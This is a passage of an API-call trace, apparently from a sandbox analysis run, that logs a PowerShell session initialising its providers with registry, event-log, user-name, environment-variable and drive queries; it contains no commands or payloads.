	[0351.541] RegCloseKey (hKey=0x388) returned 0x0
	[0351.541] RegCloseKey (hKey=0x364) returned 0x0
	[0351.542] RegCloseKey (hKey=0x384) returned 0x0
	[0351.546] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b990008
	[0351.957] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8c7d8*="WSMan", lpRawData=0x2f8c548) returned 1
	[0351.961] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.961] CoTaskMemFree (pv=0x1b8a70) 
	[0351.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.963] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0351.963] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0351.964] CoTaskMemFree (pv=0x1b8ae300) 
	[0351.964] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.964] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0351.964] CoTaskMemFree (pv=0x202920) 
	[0351.964] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f921b8*="Alias", lpRawData=0x2f91f48) returned 1
	[0351.969] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.969] CoTaskMemFree (pv=0x1b8a70) 
	[0351.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.970] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0351.970] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0351.971] CoTaskMemFree (pv=0x1b8ae300) 
	[0351.971] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.971] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0351.971] CoTaskMemFree (pv=0x202920) 
	[0351.971] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f977b0*="Environment", lpRawData=0x2f97540) returned 1
	[0351.975] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.975] CoTaskMemFree (pv=0x1b8a70) 
	[0351.976] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.976] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0351.976] CoTaskMemFree (pv=0x1b8a70) 
	[0351.976] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.976] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0351.976] CoTaskMemFree (pv=0x1b8a70) 
	[0351.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xad210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0351.976] SetErrorMode (uMode=0x1) returned 0x1
	[0351.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xad420 | out: lpFileInformation=0xad420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.977] SetErrorMode (uMode=0x1) returned 0x1
	[0351.978] GetLogicalDrives () returned 0x4
	[0351.978] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.979] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.979] SetErrorMode (uMode=0x1) returned 0x1
	[0351.980] CoTaskMemAlloc (cb=0x68) returned 0x27d7e0
	[0351.980] CoTaskMemAlloc (cb=0x68) returned 0x27d3f0
	[0351.980] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x27d7e0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xad3f0, lpMaximumComponentLength=0xad3ec, lpFileSystemFlags=0xad3e8, lpFileSystemNameBuffer=0x27d3f0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xad3f0*=0x9c354b42, lpMaximumComponentLength=0xad3ec*=0xff, lpFileSystemFlags=0xad3e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0351.980] CoTaskMemFree (pv=0x27d7e0) 
	[0351.980] CoTaskMemFree (pv=0x27d3f0) 
	[0351.980] SetErrorMode (uMode=0x1) returned 0x1
	[0351.980] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.981] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.981] SetErrorMode (uMode=0x1) returned 0x1
	[0351.981] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad390 | out: lpFileInformation=0xad390*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.981] SetErrorMode (uMode=0x1) returned 0x1
	[0351.981] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.981] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.981] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0351.982] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.982] SetErrorMode (uMode=0x1) returned 0x1
	[0351.982] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad1c0 | out: lpFileInformation=0xad1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.982] SetErrorMode (uMode=0x1) returned 0x1
	[0351.982] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.982] SetErrorMode (uMode=0x1) returned 0x1
	[0351.982] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad1c0 | out: lpFileInformation=0xad1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.982] SetErrorMode (uMode=0x1) returned 0x1
	[0351.982] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0351.982] SetErrorMode (uMode=0x1) returned 0x1
	[0351.982] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad260 | out: lpFileInformation=0xad260*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0351.983] SetErrorMode (uMode=0x1) returned 0x1
	[0351.983] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0351.983] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0351.983] CoTaskMemFree (pv=0x1b8ae300) 
	[0351.983] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.983] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0351.984] CoTaskMemFree (pv=0x202920) 
	[0351.984] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f9e8a0*="FileSystem", lpRawData=0x2f9e630) returned 1
	[0351.995] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0351.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.995] CoTaskMemFree (pv=0x1b8a70) 
	[0351.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.996] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0351.996] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0351.997] CoTaskMemFree (pv=0x1b8ae300) 
	[0351.997] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0351.997] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0351.997] CoTaskMemFree (pv=0x202920) 
	[0351.997] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa40e0*="Function", lpRawData=0x2fa3e70) returned 1
	[0352.002] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0352.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.002] CoTaskMemFree (pv=0x1b8a70) 
	[0352.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.561] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0352.561] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0352.562] CoTaskMemFree (pv=0x1b8ae300) 
	[0352.562] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0352.562] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0352.562] CoTaskMemFree (pv=0x202920) 
	[0352.562] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd6370*="Registry", lpRawData=0x2fd6100) returned 1
	[0352.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.988] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0352.988] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0352.988] CoTaskMemFree (pv=0x1b8ae300) 
	[0352.988] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0352.988] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0352.988] CoTaskMemFree (pv=0x202920) 
	[0352.989] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fdb788*="Variable", lpRawData=0x2fdb518) returned 1
	[0352.993] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0352.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.993] CoTaskMemFree (pv=0x1b8a70) 
	[0352.996] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0352.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0352.996] CoTaskMemFree (pv=0x1b8a70) 
	[0352.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0353.030] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0353.030] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad668 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad668) returned 0x1
	[0353.264] CoTaskMemFree (pv=0x1b8ae300) 
	[0353.264] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0353.264] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad6a8) returned 1
	[0353.264] CoTaskMemFree (pv=0x202920) 
	[0353.265] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fef3a0*="Certificate", lpRawData=0x2fef130) returned 1
	[0353.325] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.326] CoTaskMemFree (pv=0x1b8a70) 
	[0353.327] GetLogicalDrives () returned 0x4
	[0353.327] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0353.328] CoTaskMemAlloc (cb=0x20e) returned 0x251100
	[0353.328] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x251100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0353.328] CoTaskMemFree (pv=0x251100) 
	[0353.330] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.330] CoTaskMemFree (pv=0x1b8a70) 
	[0353.330] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.330] CoTaskMemFree (pv=0x1b8a70) 
	[0353.341] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.342] CoTaskMemFree (pv=0x1b8a70) 
	[0353.342] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.343] CoTaskMemFree (pv=0x1b8a70) 
	[0353.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.343] SetErrorMode (uMode=0x1) returned 0x1
	[0353.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.343] SetErrorMode (uMode=0x1) returned 0x1
	[0353.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.344] SetErrorMode (uMode=0x1) returned 0x1
